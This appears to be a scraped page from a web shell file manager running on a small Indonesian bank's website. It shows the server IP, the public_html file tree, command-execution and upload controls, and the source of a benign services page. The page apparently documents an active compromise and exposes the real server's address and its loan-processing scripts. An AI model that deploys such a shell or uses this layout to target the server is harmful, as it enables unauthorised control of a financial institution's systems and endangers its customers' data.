File Manager
Server IP: 103.233.102.32
Your IP: 18.117.73.72
Current Path: /
/
home
/
bprcakhr
/
public_html
Back to Parent Directory
Create New Directory:
Upload File:
Run Command:
Name
Action
database/
Delete
|
Rename
db/
Delete
|
Rename
images/
Delete
|
Rename
cakhra2.png
Download
|
Delete
|
Edit
|
Rename
deposito.php
Download
|
Delete
|
Edit
|
Rename
error_log
Download
|
Delete
|
Edit
|
Rename
index.php
Download
|
Delete
|
Edit
|
Rename
kre_investasi.php
Download
|
Delete
|
Edit
|
Rename
kre_konsutif.php
Download
|
Delete
|
Edit
|
Rename
kre_modal_kerja.php
Download
|
Delete
|
Edit
|
Rename
layanan.php
Download
|
Delete
|
Edit
|
Rename
logo1.png
Download
|
Delete
|
Edit
|
Rename
lokasi.php
Download
|
Delete
|
Edit
|
Rename
mahasiswaa.php
Download
|
Delete
|
Edit
|
Rename
post.php
Download
|
Delete
|
Edit
|
Rename
post_publikasi.php
Download
|
Delete
|
Edit
|
Rename
proses-kredit.php
Download
|
Delete
|
Edit
|
Rename
proses_kredit1.php
Download
|
Delete
|
Edit
|
Rename
proses_pengajuan.php
Download
|
Delete
|
Edit
|
Rename
publikasi.php
Download
|
Delete
|
Edit
|
Rename
sim-depo.php
Download
|
Delete
|
Edit
|
Rename
sosialisasi.php
Download
|
Delete
|
Edit
|
Rename
tab-berhadiah.php
Download
|
Delete
|
Edit
|
Rename
tab-bisnis.php
Download
|
Delete
|
Edit
|
Rename
tab-inti.php
Download
|
Delete
|
Edit
|
Rename
tab-intiplus.php
Download
|
Delete
|
Edit
|
Rename
tab.php
Download
|
Delete
|
Edit
|
Rename
tabungan.php
Download
|
Delete
|
Edit
|
Rename
uploadstest.png
Download
|
Delete
|
Edit
|
Rename
Edit File: ./layanan.php
<!DOCTYPE html> <html> <head> <title>BANK CAKHRA</title> <link rel="icon" type="image/png" href="images/logo1.png"> <link rel="stylesheet" type="text/css" href="style.css"> <style> body { margin: 0; padding: 0; font-family: Arial, sans-serif; background-color: #f4f4f4; } .container { max-width: 1200px; margin: 0 auto; padding: 20px; } h1 { text-align: center; color: #333; margin-bottom: 40px; } .services { display: flex; flex-wrap: wrap; /* Memungkinkan responsif dengan membungkus elemen */ justify-content: space-between; /* Spasi merata di antara layanan */ gap: 20px; } .service { background: #fff; border: 1px solid #ddd; border-radius: 10px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1); flex: 1 1 calc(20% - 20px); /* Menentukan lebar kolom relatif */ min-width: 200px; max-width: 250px; padding: 20px; text-align: center; transition: transform 0.3s, box-shadow 0.3s; } .service:hover { transform: translateY(-5px); box-shadow: 0 6px 10px rgba(0, 0, 0, 0.15); } .service h2 { font-size: 1.5em; color: #007BFF; margin-bottom: 15px; } .service ul { list-style: none; padding: 0; margin: 0; } .service ul li { font-size: 0.9em; color: #555; padding: 5px 0; border-bottom: 1px solid #f0f0f0; } .service ul li:last-child { border-bottom: none; } /* Responsif untuk smartphone */ @media screen and (max-width: 768px) { .services { flex-direction: column; /* Kolom menjadi vertikal */ gap: 15px; } .service { flex: 1 1 100%; /* Lebar penuh untuk tampilan kecil */ } } </style> </head> </head> <body> <?php include 'nav.php'; ?> <div class="container"> <h1>Daftar Layanan</h1> <div class="services"> <div class="service"> <h2>PLN</h2> <ul> <li>PLN Postpaid</li> <li>PLN Prepaid/Token</li> </ul> </div> <div class="service"> <h2>BPJS</h2> <ul> <li>BPJS Kesehatan</li> <li>BPJS Ketenagakerjaan</li> </ul> </div> <div class="service"> <h2>TELKOM</h2> <ul> <li>Telepon</li> <li>Kartu Halo</li> <li>Speedy/Indihome</li> <li>Telkom Vision</li> </ul> </div> <div class="service"> <h2>PULSA</h2> <ul> <li>Telkomsel</li> <li>Indosat</li> <li>XL, Axis</li> <li>Three</li> <li>Smartfren</li> </ul> </div> <div class="service"> <h2>MULTIFINANCE</h2> <ul> <li>Mega Finance</li> <li>FIF</li> <li>WOKA</li> <li>SMART</li> <li>Radana</li> <li>MAF</li> <li>WOM</li> <li>BAF</li> <li>MCF</li> </ul> </div> <div class="service"> <h2>TV BERLANGGANAN</h2> <ul> <li>MNC Vision</li> <li>Firstmedia</li> <li>Nexmedia</li> <li>Myrepublic</li> <li>Aora TV, TOP TV, YESTV</li> <li>Kvision</li> <li>Transvision</li> <li>Indovision</li> </ul> </div> </div> </div> </body> </html>